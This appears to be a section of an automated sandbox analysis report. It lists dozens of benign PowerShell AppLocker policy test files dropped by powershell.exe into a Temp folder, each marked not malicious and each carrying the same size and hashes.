                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvnolp0w.rdd.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o3p3mziw.vyb.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oa5sf4tx.3lj.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ooonmapl.qcr.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ovdq40dm.1k0.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oyhzuedu.s2o.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdefbbtx.zud.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkin1yzi.wfc.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pq3nbccp.30x.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psm5q3ke.1i0.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qc2wt40r.hlf.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbbnsb3q.nyv.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbv0fist.xfm.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfszud4r.nr0.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s4rhdblp.vof.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_san3jiij.tll.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sffoowmt.y4p.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_siezieiv.1je.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spuw5ogz.2bk.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmqy4g3w.plq.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txsgfq0m.2bm.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tyijjjv4.pr0.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0akgmxx.npw.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uapnnrag.nl1.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ukkohgqi.3it.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_un1nvyre.btf.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uny2okyi.mkw.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0buk3vk.n1r.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_voscx1hw.ocw.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
